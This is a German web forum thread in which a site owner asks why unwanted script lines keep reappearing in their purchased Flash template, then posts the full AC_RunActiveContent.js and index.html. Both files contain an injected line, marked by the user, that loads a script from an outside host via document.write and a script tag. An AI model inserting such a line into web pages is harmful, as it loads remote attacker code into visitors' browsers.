Wie kann ich herausfinden was Flash sendet und sie dann zu löschen

Aurora-One

Grünschnabel
Hallo ,
ich brauch mal eine kleine hilfe bei flash,

das heißt , ich habe swf datei und javasript datei und indexdatei

nun vor monaten hat es bei mir angefangen das auf meine index seite verschiede iframe warnungen von av bekommen das script trin sind die wo ich nicht hin geschrieben habe,
ich habs immer wieder gelöscht und ftp zugänge geändert, dann ist mir en gedanken gekommen das aus flash kommen könnte aber da ich nicht soviel anhnung habe, frage ich hier nach.
Dann die tage habe ich in die .JS datein rein geschaut und da stand dann auch die links habs sie da auch gelöscht dachte jetzt hörts auf aber vor zwanzig minuten habe ich alles neu auf gesetzt und jetzt stand es wieder in denn js und index datei ich weiß mir nimmer zu helfen dabei habe ich das legal gekauft bei monstertemplate.

bitte um hilfe bei der lösung um denn fall

danke
mfg
Aurora-One
 
Hi,

um dir bei deinem Problemfall behilflich sein zu können, solltest du den Hilfeleistenden einen Einblick in dein Schaffen gewähren (Quellcode posten, fla-Datei hochladen, Link zur Seite nennen).

Und beachte bitte unsere Netiquette bzgl. der erwünschten Groß- und Kleinschreibung - vielen Dank! :)

mfg Maik
 
Die AC_RunActiveContent.js
Code:
//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated.  All rights reserved.
var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;

function ControlVersion()
{
	var version;
	var axo;
	var e;

	// NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry

	try {
		// version will be set for 7.X or greater players
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
		version = axo.GetVariable("$version");
	} catch (e) {
	}

	if (!version)
	{
		try {
			// version will be set for 6.X players only
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
			
			// installed player is some revision of 6.0
			// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
			// so we have to be careful. 
			
			// default to the first public version
			version = "WIN 6,0,21,0";

			// throws if AllowScripAccess does not exist (introduced in 6.0r47)		
			axo.AllowScriptAccess = "always";

			// safe to call for 6.0r47 or greater
			version = axo.GetVariable("$version");

		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 4.X or 5.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = axo.GetVariable("$version");
		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 3.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = "WIN 3,0,18,0";
		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 2.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
			version = "WIN 2,0,0,11";
		} catch (e) {
			version = -1;
		}
	}
	
	return version;
}

// JavaScript helper required to detect Flash Player PlugIn version information
function GetSwfVer(){
	// NS/Opera version >= 3 check for Flash plugin in plugin array
	var flashVer = -1;
	
	if (navigator.plugins != null && navigator.plugins.length > 0) {
		if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
			var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
			var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
			var descArray = flashDescription.split(" ");
			var tempArrayMajor = descArray[2].split(".");			
			var versionMajor = tempArrayMajor[0];
			var versionMinor = tempArrayMajor[1];
			var versionRevision = descArray[3];
			if (versionRevision == "") {
				versionRevision = descArray[4];
			}
			if (versionRevision[0] == "d") {
				versionRevision = versionRevision.substring(1);
			} else if (versionRevision[0] == "r") {
				versionRevision = versionRevision.substring(1);
				if (versionRevision.indexOf("d") > 0) {
					versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
				}
			}
			var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
		}
	}
	// MSN/WebTV 2.6 supports Flash 4
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
	// WebTV 2.5 supports Flash 3
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
	// older WebTV supports Flash 2
	else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
	else if ( isIE && isWin && !isOpera ) {
		flashVer = ControlVersion();
	}	
	return flashVer;
}

// When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision)
{
	versionStr = GetSwfVer();
	if (versionStr == -1 ) {
		return false;
	} else if (versionStr != 0) {
		if(isIE && isWin && !isOpera) {
			// Given "WIN 2,0,0,11"
			tempArray         = versionStr.split(" "); 	// ["WIN", "2,0,0,11"]
			tempString        = tempArray[1];			// "2,0,0,11"
			versionArray      = tempString.split(",");	// ['2', '0', '0', '11']
		} else {
			versionArray      = versionStr.split(".");
		}
		var versionMajor      = versionArray[0];
		var versionMinor      = versionArray[1];
		var versionRevision   = versionArray[2];

        	// is the major.revision >= requested major.revision AND the minor version >= requested minor
		if (versionMajor > parseFloat(reqMajorVer)) {
			return true;
		} else if (versionMajor == parseFloat(reqMajorVer)) {
			if (versionMinor > parseFloat(reqMinorVer))
				return true;
			else if (versionMinor == parseFloat(reqMinorVer)) {
				if (versionRevision >= parseFloat(reqRevision))
					return true;
			}
		}
		return false;
	}
}

function AC_AddExtension(src, ext)
{
  if (src.indexOf('?') != -1)
    return src.replace(/\?/, ext+'?'); 
  else
    return src + ext;
}

function AC_Generateobj(objAttrs, params, embedAttrs) 
{ 
  var str = '';
  if (isIE && isWin && !isOpera)
  {
    str += '<object ';
    for (var i in objAttrs)
    {
      str += i + '="' + objAttrs[i] + '" ';
    }
    str += '>';
    for (var i in params)
    {
      str += '<param name="' + i + '" value="' + params[i] + '" /> ';
    }
    str += '</object>';
  }
  else
  {
    str += '<embed ';
    for (var i in embedAttrs)
    {
      str += i + '="' + embedAttrs[i] + '" ';
    }
    str += '> </embed>';
  }

  document.write(str);
}

function AC_FL_RunContent(){
  var ret = 
    AC_GetArgs
    (  arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
     , "application/x-shockwave-flash"
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}

function AC_SW_RunContent(){
  var ret = 
    AC_GetArgs
    (  arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000"
     , null
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}

function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
  var ret = new Object();
  ret.embedAttrs = new Object();
  ret.params = new Object();
  ret.objAttrs = new Object();
  for (var i=0; i < args.length; i=i+2){
    var currArg = args[i].toLowerCase();    

    switch (currArg){	
      case "classid":
        break;
      case "pluginspage":
        ret.embedAttrs[args[i]] = args[i+1];
        break;
      case "src":
      case "movie":	
        args[i+1] = AC_AddExtension(args[i+1], ext);
        ret.embedAttrs["src"] = args[i+1];
        ret.params[srcParamName] = args[i+1];
        break;
      case "onafterupdate":
      case "onbeforeupdate":
      case "onblur":
      case "oncellchange":
      case "onclick":
      case "ondblClick":
      case "ondrag":
      case "ondragend":
      case "ondragenter":
      case "ondragleave":
      case "ondragover":
      case "ondrop":
      case "onfinish":
      case "onfocus":
      case "onhelp":
      case "onmousedown":
      case "onmouseup":
      case "onmouseover":
      case "onmousemove":
      case "onmouseout":
      case "onkeypress":
      case "onkeydown":
      case "onkeyup":
      case "onload":
      case "onlosecapture":
      case "onpropertychange":
      case "onreadystatechange":
      case "onrowsdelete":
      case "onrowenter":
      case "onrowexit":
      case "onrowsinserted":
      case "onstart":
      case "onscroll":
      case "onbeforeeditfocus":
      case "onactivate":
      case "onbeforedeactivate":
      case "ondeactivate":
      case "type":
      case "codebase":
      case "id":
        ret.objAttrs[args[i]] = args[i+1];
        break;
      case "width":
      case "height":
      case "align":
      case "vspace": 
      case "hspace":
      case "class":
      case "title":
      case "accesskey":
      case "name":
      case "tabindex":
        ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
        break;
      default:
        ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
    }
  }
  ret.objAttrs["classid"] = classid;
  if (mimeType) ret.embedAttrs["type"] = mimeType;
  return ret;
}
das sollte hier nicht stehen document.write('<script src=http://ec-sportsweb.com/PhotoAlbums/Home1.php ><\/script>');
Index.html
Code:
<html>
<head>
<meta name="google-site-verification" content="Wg7gHSnDMONMfvMquMPC2tgPlWc35NMj-qiBr-_FgSU" />
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="content-language" content="de">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" lang="de" content="Kewwords ">
<meta name="author" content="Ich">
<meta name="copyright" content="bei mir">
<meta http-equiv="Reply-to" content="email">
<meta http-equiv="content-language" content="IT">
<meta name="ROBOTS" content="INDEX">
<meta name="creation_Date" content="06/20/2009">
<meta name="revisit-after" content="7 days">
<title>TITEL</title>
<script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
</head>

das sollte hier nicht stehen<script src=http://ec-sportsweb.com/PhotoAlbums/Home1.php ></script><body><center>
<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','1024','height','768','src','flash','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','movie','flash' ); //end AC code
</script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="1024" height="768">
  <param name="movie" value="flash.swf" />
  <param name="quality" value="high" />
  <embed src="flash.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="1024" height="768"></embed>
</object></noscript></center>
</body>
</html>
 

Neue Beiträge

Zurück